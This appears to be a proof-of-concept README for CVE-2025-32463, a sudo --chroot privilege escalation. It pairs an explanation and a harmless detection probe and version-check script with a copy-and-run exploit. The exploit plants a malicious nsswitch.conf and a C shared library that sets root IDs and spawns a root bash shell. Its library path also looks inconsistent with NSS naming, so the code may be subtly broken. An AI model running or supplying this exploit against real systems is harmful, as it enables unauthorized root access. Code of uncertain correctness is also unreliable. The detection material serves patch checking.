
CVE-2025-32463 PoC — Sudo security vulnerability

Related vulnerability
Title: Sudo security vulnerability (CVE-2025-32463)
Description: Sudo is a program for Unix-like systems that lets users run commands with special privileges in a controlled way. Sudo versions before 1.9.17p1 contain a security vulnerability: /etc/nsswitch.conf is read from a user-controlled directory, which can lead to obtaining root access.
Description
Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
Introduction
# CVE-2025-32463
This repository contains an educational proof-of-concept (PoC) exploit for CVE-2025-32463, a critical privilege escalation vulnerability in the sudo command. The vulnerability allows a local user to gain root privileges on affected systems.

## CVE ID: CVE-2025-32463

- Type: Local Privilege Escalation (LPE)
- CVSS v3.1 Score: 9.3 (Critical) - `AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
- Vendor: Sudo Project
- Affected Versions: Sudo versions prior to `1.9.17p1`

The vulnerability exists in the -R (--chroot) option of sudo. When this option is used with a user-controlled directory, sudo incorrectly trusts the `nsswitch.conf` file from within that chroot jail. This allows an attacker to specify a malicious shared library for the Name Service Switch (NSS) mechanism to load, resulting in code execution with root privileges.

The sudo command needs to resolve user and group identities. To do this, it uses the Name Service Switch (NSS) mechanism, which is configured by the /etc/nsswitch.conf file. This file specifies which libraries (e.g., libnss_files.so.2, libnss_systemd.so.2) should be used to look up different types of information (passwords, groups, hosts, etc.).

When the -R or --chroot option is used, sudo changes its root directory to the specified path before executing the command. The vulnerability is that sudo would then read the nsswitch.conf file from within this new chroot environment ($CHROOT/etc/nsswitch.conf) instead of using the trusted host system's /etc/nsswitch.conf.

## Testing Vulnerability

This is the fastest and safest way to check. It invokes the `-R` option with a directory and a command that do not exist, so the invocation always fails, and the wording of the error message tells you whether the fix is present.

```bash
sudo -R nonexistent_directory nonexistent_command
```
If your system is VULNERABLE, you will see an error like this:

```bash
sudo: nonexistent_directory: No such file or directory
```

If your system is PATCHED, you will see an error like this:

```bash
sudo: you are not permitted to use the -R option with nonexistent_command
```
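The same check as a script, added here as an example and not code from the PoC repository. It pairs the error-message probe above with a comparison of the installed version against 1.9.17p1; it assumes the first line of `sudo --version` has the form `Sudo version X.Y.Z[pN]`, and the `--run` flag and function names are this example's own.

```shell
#!/bin/sh
# Added defensive check for CVE-2025-32463 (not from the PoC repository): the installed
# sudo version string against the fixed release 1.9.17p1, plus the harmless "-R" probe.

# Turn "1.9.17p1" into four numeric fields "1 9 17 1"; a missing "pN" counts as p0.
sudo_version_fields() {
    printf '%s\n' "$1" | awk -F'[.p]' '{ printf "%d %d %d %d\n", $1, $2, $3, $4 }'
}

# True (exit 0) when version $1 is older than version $2.
version_older_than() {
    set -- $(sudo_version_fields "$1") $(sudo_version_fields "$2")
    if   [ "$1" -ne "$5" ]; then older=$(( $1 < $5 ))
    elif [ "$2" -ne "$6" ]; then older=$(( $2 < $6 ))
    elif [ "$3" -ne "$7" ]; then older=$(( $3 < $7 ))
    else                         older=$(( $4 < $8 ))
    fi
    [ "$older" -eq 1 ]
}

# Map the stderr of "sudo -R nonexistent_directory nonexistent_command" to a verdict
# using the two messages quoted above; anything else is "unknown", not guessed.
classify_chroot_probe() {
    case $1 in
        *"not permitted to use the -R option"*) echo patched ;;
        *"No such file or directory"*)          echo vulnerable ;;
        *)                                      echo unknown ;;
    esac
}

# First line of "sudo --version" looks like "Sudo version 1.9.15p5" (assumption).
installed_sudo_version() {
    sudo --version 2>/dev/null | sed -n '1s/^Sudo version //p'
}

# Live run (only with --run). Distributions backport fixes without bumping the
# version, so the version result is a hint and the probe verdict is the stronger signal.
main() {
    v=$(installed_sudo_version)
    if [ -z "$v" ]; then echo "sudo not found"; return 1; fi
    if version_older_than "$v" 1.9.17p1; then
        echo "sudo $v predates 1.9.17p1: likely affected unless the fix was backported"
    else
        echo "sudo $v is 1.9.17p1 or newer"
    fi
    out=$(sudo -R nonexistent_directory nonexistent_command 2>&1 || true)
    echo "-R probe verdict: $(classify_chroot_probe "$out")"
}
case ${1:-} in --run) main ;; esac
```

Run it as `sh check.sh --run`; the probe may ask for your password, exactly as the manual command does.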
## Exploitation

Just run this in your terminal:

```bash
STAGE=$(mktemp -d /tmp/exploit.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > exploit.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void exploit(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);
}
EOF

# Create the chroot structure AND a lib directory inside it
mkdir -p exploit/etc exploit/lib
echo "passwd: /exploit123" > exploit/etc/nsswitch.conf
cp /etc/group exploit/etc

# Compile the library directly into the chroot's ./lib folder
gcc -shared -fPIC -Wl,-init,exploit -o exploit/lib/exploit123.so.2 exploit.c

echo "Pwned!"
sudo -R exploit exploit123
```

Disclaimer: This information is provided for educational and security testing purposes only. Use only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.